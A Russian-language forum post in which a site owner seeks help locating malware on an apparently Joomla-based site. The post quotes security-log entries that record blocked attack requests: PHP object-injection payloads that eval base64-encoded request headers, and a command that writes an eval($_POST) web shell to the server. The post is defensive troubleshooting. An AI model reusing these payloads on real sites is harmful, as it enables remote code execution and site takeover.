Добрый день.
Пытаюсь обнаружить вирус на сайте (особо ничем не проявляет себя, но в результатах выдачи сайт помечен как с возможным заражением). Вебмастер прислал сообщения с ссылками на страницы, в которых ломаный контент, но данные ничем мне эти не помогли.. с них идет просто переадрес на главную страницу.
Скачал сайт с ftp на локал. Распаковал, проверил avz и cureit - все число. Ссылок на сторонние ресурсы нигде нет. Фреймов не нашел. По общей инфе что искать - прошелся. По "eval(base64" нашел только один файлик /logs/jhackguard-log.php - я так понимаю, это лог ошибок, и самого вируса там быть не может?
Несколько фрагментов:
2016-06-10T07:40:19+00:00 CRITICAL jhackguard Changed POST value from:ububv}__vzgcqpzryo|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:71:"eval(base64_decode($_SERVER['HTTP_CNXVS']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ðýýý to:
2016-07-20T01:57:37+00:00 CRITICAL jhackguard Changed POST value from:uktdc}__lyqfkcvdcb|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:82:"eval(base64_decode(str_rot13($_SERVER['HTTP_ESOCW'])));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ðýýý to:
2016-08-04T04:06:13+00:00 CRITICAL jhackguard Changed GET value from: @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/configurationbak.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; to: @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/configurationbak.php','PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
Уже вторые сутки просматриваю в ручную, в php js не силен, крыша едет пока что
Если кто сможет ответить, или помочь, + к карме Вам обеспечен, можно в виде хороших отзывов где-то